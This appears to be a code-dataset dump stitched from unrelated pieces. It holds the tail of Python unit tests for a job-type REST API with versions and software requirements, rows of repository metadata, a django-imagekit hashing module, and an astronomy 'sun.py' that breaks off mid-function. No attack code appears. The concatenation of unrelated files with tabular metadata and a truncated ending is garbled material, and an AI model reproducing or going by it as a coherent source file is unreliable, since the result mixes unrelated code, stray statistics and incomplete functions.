def test_jobtype_put_with_no_name(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"unknown_key": 42
}))
self.assert_bad_request(response1)
def test_jobtype_put_with_requirements(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
software_id = response1.json['id']
software_min_version_id = response1.json["versions"][0]["id"]
software_max_version_id = response1.json["versions"][1]["id"]
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
}
]
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_ok(response3)
self.assertEqual(
response3.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [
{
'max_version': '1.1',
'max_version_id': software_max_version_id,
'min_version': '1.0',
'min_version_id': software_min_version_id,
'software': 'foo',
'software_id': software_id
}
],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_put_with_requirements_not_list(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": 42
}))
self.assert_bad_request(response1)
def test_jobtype_put_with_requirement_not_dict(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [42]
}))
self.assert_bad_request(response1)
def test_jobtype_put_with_requirement_unknown_software(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
}
]
}))
self.assert_not_found(response1)
def test_jobtype_put_with_requirements_unknown_sw_version(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo"
}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.1"
}
]
}))
self.assert_not_found(response2)
response3 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"max_version": "1.1"
}
]
}))
self.assert_not_found(response3)
def test_jobtype_put_with_requirements_unknown_keys(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo"
}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"unknown_key": 42
}
]
}))
self.assert_bad_request(response2)
def test_jobtype_put_with_requirements_missing_keys(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{}
]
}))
self.assert_bad_request(response1)
def test_jobtype_put_retain_requirements(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
software_id = response1.json['id']
software_min_version_id = response1.json["versions"][0]["id"]
software_max_version_id = response1.json["versions"][1]["id"]
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
}
]
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing (updated)",
"max_batch": 1,
"code": code
}))
self.assert_created(response3)
response4 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_ok(response4)
self.assertEqual(
response4.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing (updated)",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [
{
'max_version': '1.1',
'max_version_id': software_max_version_id,
'min_version': '1.0',
'min_version_id': software_min_version_id,
'software': 'foo',
'software_id': software_id
}
],
"version": 2,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_delete(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
}
]
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.delete("/api/v1/jobtypes/TestJobType")
self.assert_no_content(response3)
response4 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_not_found(response4)
response5 = self.client.get("/api/v1/jobtypes/%s" % id)
self.assert_not_found(response5)
def test_jobtype_delete_by_id(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
}
]
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.delete("/api/v1/jobtypes/%s" % id)
self.assert_no_content(response3)
response4 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_not_found(response4)
response5 = self.client.get("/api/v1/jobtypes/%s" % id)
self.assert_not_found(response5)
def test_jobtype_list_versions(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.put(
"/api/v1/jobtypes/%s" % id,
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing (updated)",
"max_batch": 1,
"code": code
}))
self.assert_created(response2)
response3 = self.client.get("/api/v1/jobtypes/TestJobType/versions/")
self.assert_ok(response3)
self.assertEqual(response3.json, [1, 2])
response4 = self.client.get("/api/v1/jobtypes/%s/versions/" % id)
self.assert_ok(response4)
self.assertEqual(response4.json, [1, 2])
def test_jobtype_list_versions_unknown_jobtype(self):
response1 = self.client.get("/api/v1/jobtypes/UnknownJobType/versions/")
self.assert_not_found(response1)
def test_jobtype_get_versioned(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": []
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 2,
"code": code,
"software_requirements": []
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.get("/api/v1/jobtypes/TestJobType/versions/1")
self.assert_ok(response3)
self.assertEqual(
response3.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
response4 = self.client.get("/api/v1/jobtypes/%s/versions/1" % id)
self.assert_ok(response4)
self.assertEqual(
response4.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
response5 = self.client.get("/api/v1/jobtypes/%s/versions/2" % id)
self.assert_ok(response5)
self.assertEqual(
response5.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 2,
"name": "TestJobType",
"software_requirements": [],
"version": 2,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_get_unknown_version(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": []
}))
self.assert_created(response1)
response2 = self.client.get("/api/v1/jobtypes/TestJobType/versions/42")
self.assert_not_found(response2)
def test_jobtype_delete_version(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": []
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 2,
"code": code,
"software_requirements": []
}))
self.assert_created(response2)
response3 = self.client.delete("/api/v1/jobtypes/TestJobType/versions/2")
self.assert_no_content(response3)
response4 = self.client.get("/api/v1/jobtypes/TestJobType/versions/2")
self.assert_not_found(response4)
response5 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_ok(response5)
self.assertEqual(
response5.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_by_id_delete_version(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": []
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 2,
"code": code,
"software_requirements": []
}))
self.assert_created(response2)
response3 = self.client.delete("/api/v1/jobtypes/%s/versions/2" % id)
self.assert_no_content(response3)
response4 = self.client.get("/api/v1/jobtypes/TestJobType/versions/2")
self.assert_not_found(response4)
response5 = self.client.get("/api/v1/jobtypes/TestJobType")
self.assert_ok(response5)
self.assertEqual(
response5.json, {
"batch_contiguous": True,
"no_automatic_start_time": False,
"classname": None,
"code": code,
"description": "Jobtype for testing inserts and queries",
"id": id,
"max_batch": 1,
"name": "TestJobType",
"software_requirements": [],
"version": 1,
"fail_body": None,
"fail_subject": None,
"success_body": None,
"success_subject": None,
"supports_tiling": False
})
def test_jobtype_get_code(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": []
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.get(
"/api/v1/jobtypes/TestJobType/versions/1/code")
self.assert_ok(response2)
self.assertEqual(response2.data.decode(), code)
response3 = self.client.get(
"/api/v1/jobtypes/%s/versions/1/code" % id)
self.assert_ok(response3)
self.assertEqual(response3.data.decode(), code)
def test_jobtype_get_code_not_found(self):
response1 = self.client.get(
"/api/v1/jobtypes/UnknownJobType/versions/1/code")
self.assert_not_found(response1)
def test_jobtype_list_requirements(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
software_id = response1.json['id']
software_min_version_id = response1.json["versions"][0]["id"]
software_max_version_id = response1.json["versions"][1]["id"]
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
}
]
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/")
self.assert_ok(response3)
self.assertEqual(response3.json, [
{
"software": {
"software": "foo",
"id": software_id
},
"max_version": {
"version": "1.1",
"id": software_max_version_id
},
"min_version": {
"version": "1.0",
"id": software_min_version_id
},
"jobtype_version": {
"version": 1,
"jobtype": "TestJobType",
}
}
])
response4 = self.client.get(
"/api/v1/jobtypes/%s/versions/1/software_requirements/" % id)
self.assert_ok(response4)
self.assertEqual(response4.json, [
{
"software": {
"software": "foo",
"id": software_id
},
"max_version": {
"version": "1.1",
"id": software_max_version_id
},
"min_version": {
"version": "1.0",
"id": software_min_version_id
},
"jobtype_version": {
"version": 1,
"jobtype": "TestJobType",
}
}
])
def test_jobtype_list_requirements_unknown_jobtype(self):
response1 = self.client.get(
"/api/v1/jobtypes/UnknownJobType/software_requirements/")
self.assert_not_found(response1)
def test_jobtype_list_requirements_unknown_version(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.get(
"/api/v1/jobtypes/TestJobType/versions/100/software_requirements/")
self.assert_not_found(response2)
def test_jobtype_post_requirement(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response2)
software_id = response2.json['id']
software_min_version_id = response2.json["versions"][0]["id"]
software_max_version_id = response2.json["versions"][1]["id"]
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({
"software" : "foo",
"min_version": "1.0",
"max_version": "1.1"}))
self.assert_created(response3)
response4 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/")
self.assert_ok(response4)
self.assertEqual(response4.json, [
{
"software": {
"software": "foo",
"id": software_id
},
"max_version": {
"version": "1.1",
"id": software_max_version_id
},
"min_version": {
"version": "1.0",
"id": software_min_version_id
},
"jobtype_version": {
"version": 2,
"jobtype": "TestJobType",
}
}
])
def test_jobtype_by_id_post_requirement(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
id = response1.json['id']
response2 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": []
}))
self.assert_created(response2)
response3 = self.client.post(
"/api/v1/jobtypes/%s/software_requirements/" % id,
content_type="application/json",
data=dumps({"software" : "foo"}))
self.assert_created(response3)
def test_jobtype_versioned_post_requirement(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
response2 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response2)
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/versions/1/software_requirements/",
content_type="application/json",
data=dumps({"software" : "foo"}))
self.assert_method_not_allowed(response3)
def test_jobtype_post_requirement_unknown_jobtype(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": []
}))
self.assert_created(response1)
response2 = self.client.post(
"/api/v1/jobtypes/UnknownJobType/software_requirements/",
content_type="application/json",
data=dumps({"software" : "foo"}))
self.assert_not_found(response2)
def test_jobtype_post_requirement_no_versions(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
response2 = self.client.delete("/api/v1/jobtypes/TestJobType/versions/1")
self.assert_no_content(response2)
response3 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "foo"}))
self.assert_created(response3)
response4 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software" : "foo"}))
self.assert_not_found(response4)
def test_jobtype_post_requirement_bad_software(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
response2 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({}))
self.assert_bad_request(response2)
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software": 42}))
self.assert_bad_request(response3)
def test_jobtype_post_requirement_unknown_software(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
response2 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software": "unknown software"}))
self.assert_not_found(response2)
def test_jobtype_post_requirement_with_existing(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [{
"software" : "foo",
"min_version": "1.0",
"max_version": "1.1"}]
}))
self.assert_created(response2)
response2 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "bar",
"versions": [
{"version": "0.1"},
{"version": "0.2"}
]
}))
self.assert_created(response2)
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software" : "bar",
"min_version": "0.1",
"max_version": "0.2"}))
self.assert_created(response3)
response4 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/")
self.assert_ok(response4)
self.assertEqual(len(response4.json), 2)
def test_jobtype_post_requirement_conflict(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "foo"}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [{"software" : "foo"}]
}))
self.assert_created(response2)
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software" : "foo"}))
self.assert_conflict(response3)
def test_jobtype_post_requirement_bad_min_version(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "foo"}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response2)
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software": "foo",
"min_version": 42}))
self.assert_bad_request(response3)
def test_jobtype_post_requirement_unknown_min_version(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "foo"}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response2)
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software": "foo",
"min_version": "1.0"}))
self.assert_not_found(response3)
def test_jobtype_post_requirement_bad_max_version(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "foo"}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response2)
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software": "foo",
"max_version": 42}))
self.assert_bad_request(response3)
def test_jobtype_post_requirement_unknown_max_version(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "foo"}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response2)
response3 = self.client.post(
"/api/v1/jobtypes/TestJobType/software_requirements/",
content_type="application/json",
data=dumps({"software": "foo",
"max_version": "1.0"}))
self.assert_not_found(response3)
def test_jobtype_get_single_requirement(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
software_id = response1.json['id']
software_min_version_id = response1.json["versions"][0]["id"]
software_max_version_id = response1.json["versions"][1]["id"]
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
}
]
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/foo")
self.assert_ok(response3)
self.assertEqual(
response3.json, {
"software": {
"software": "foo",
"id": software_id
},
"max_version": {
"version": "1.1",
"id": software_max_version_id
},
"min_version":
{
"version": "1.0",
"id": software_min_version_id
},
"jobtype_version": {
"version": 1,
"jobtype": "TestJobType",
}
})
response4 = self.client.get(
"/api/v1/jobtypes/%s/software_requirements/foo" % id)
self.assert_ok(response4)
def test_jobtype_single_requirement_unknown_jobtype(self):
response1 = self.client.get(
"/api/v1/jobtypes/UnknownJobType/software_requirements/1")
self.assert_not_found(response1)
def test_jobtype_single_requirement_no_versions(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
response2 = self.client.delete("/api/v1/jobtypes/TestJobType/versions/1")
self.assert_no_content(response2)
response3 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/1")
self.assert_not_found(response3)
def test_jobtype_single_requirement_not_found(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
response2 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/1")
self.assert_not_found(response2)
def test_jobtype_delete_requirement(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "foo",
"versions": [
{"version": "1.0"},
{"version": "1.1"}
]
}))
self.assert_created(response1)
response2 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({
"software": "bar",
"versions": [
{"version": "0.1"},
{"version": "0.2"}
]
}))
self.assert_created(response2)
response3 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{
"software": "foo",
"min_version": "1.0",
"max_version": "1.1"
},
{
"software": "bar",
"min_version": "0.1",
"max_version": "0.2"
}
]
}))
self.assert_created(response3)
id = response3.json['id']
response4 = self.client.delete(
"/api/v1/jobtypes/TestJobType/software_requirements/foo")
self.assert_no_content(response4)
response5 = self.client.delete(
"/api/v1/jobtypes/TestJobType/software_requirements/foo")
self.assert_no_content(response5)
response6 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/foo")
self.assert_not_found(response6)
response7 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/bar")
self.assert_ok(response7)
def test_jobtype_by_id_delete_requirement(self):
response1 = self.client.post(
"/api/v1/software/",
content_type="application/json",
data=dumps({"software": "foo"}))
self.assert_created(response1)
response2 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code,
"software_requirements": [
{"software": "foo"}
]
}))
self.assert_created(response2)
id = response2.json['id']
response3 = self.client.delete(
"/api/v1/jobtypes/%s/software_requirements/foo" % id)
self.assert_no_content(response3)
response4 = self.client.get(
"/api/v1/jobtypes/TestJobType/software_requirements/")
self.assertEqual(len(response4.json), 0)
def test_jobtype_delete_requirement_unknown_jobtype(self):
response1 = self.client.delete(
"/api/v1/jobtypes/UnknownJobType/software_requirements/1")
self.assert_not_found(response1)
def test_jobtype_delete_requirement_no_versions(self):
response1 = self.client.put(
"/api/v1/jobtypes/TestJobType",
content_type="application/json",
data=dumps({
"name": "TestJobType",
"description": "Jobtype for testing inserts and queries",
"max_batch": 1,
"code": code
}))
self.assert_created(response1)
response2 = self.client.delete("/api/v1/jobtypes/TestJobType/versions/1")
self.assert_no_content(response2)
response3 = self.client.delete(
"/api/v1/jobtypes/TestJobType/software_requirements/1")
self.assert_not_found(response3)
| 37.6834
| 81
| 0.473592
| 64,731
| 0.979897
| 0
| 0
| 0
| 0
| 0
| 0
| 19,930
| 0.3017
|
4231fa59a3b40941c8f8953e4a8dd3df4f032a6f
| 742
|
py
|
Python
|
imagekit/hashers.py
|
radicalgraphics/django-imagekit
|
e36290b4eef1faaf6ad864d3493df1458ef96fbb
|
[
"BSD-3-Clause"
] | null | null | null |
imagekit/hashers.py
|
radicalgraphics/django-imagekit
|
e36290b4eef1faaf6ad864d3493df1458ef96fbb
|
[
"BSD-3-Clause"
] | null | null | null |
imagekit/hashers.py
|
radicalgraphics/django-imagekit
|
e36290b4eef1faaf6ad864d3493df1458ef96fbb
|
[
"BSD-3-Clause"
] | null | null | null |
from copy import copy
from hashlib import md5
from pickle import Pickler, MARK, DICT
from types import DictionaryType
from .lib import StringIO
class CanonicalizingPickler(Pickler):
dispatch = copy(Pickler.dispatch)
def save_set(self, obj):
rv = obj.__reduce_ex__(0)
rv = (rv[0], (sorted(rv[1][0]),), rv[2])
self.save_reduce(obj=obj, *rv)
dispatch[set] = save_set
def save_dict(self, obj):
write = self.write
write(MARK + DICT)
self.memoize(obj)
self._batch_setitems(sorted(obj.iteritems()))
dispatch[DictionaryType] = save_dict
def pickle(obj):
file = StringIO()
CanonicalizingPickler(file, 0).dump(obj)
return md5(file.getvalue()).hexdigest()
| 23.1875
| 53
| 0.661725
| 465
| 0.626685
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
423268278bdfbc38d38322d8349807e008e76abd
| 1,262
|
py
|
Python
|
sun.py
|
funxiun/AstroAlgorithms4Python
|
98098956daba2706c993fa6370d8cdfa4013cb8d
|
[
"Unlicense"
] | 7
|
2018-09-29T11:35:40.000Z
|
2022-01-11T14:06:44.000Z
|
sun.py
|
funxiun/AstroAlgorithms4Python
|
98098956daba2706c993fa6370d8cdfa4013cb8d
|
[
"Unlicense"
] | null | null | null |
sun.py
|
funxiun/AstroAlgorithms4Python
|
98098956daba2706c993fa6370d8cdfa4013cb8d
|
[
"Unlicense"
] | 8
|
2018-09-29T11:36:01.000Z
|
2021-10-17T15:25:55.000Z
|
'''Meeus: Astronomical Algorithms (2nd ed.), chapter 25'''
import math
from nutation_ecliptic import ecliptic
from constants import AU
def coordinates(jd):
'''equatorial coordinates of Sun'''
lon=math.radians(longitude(jd))
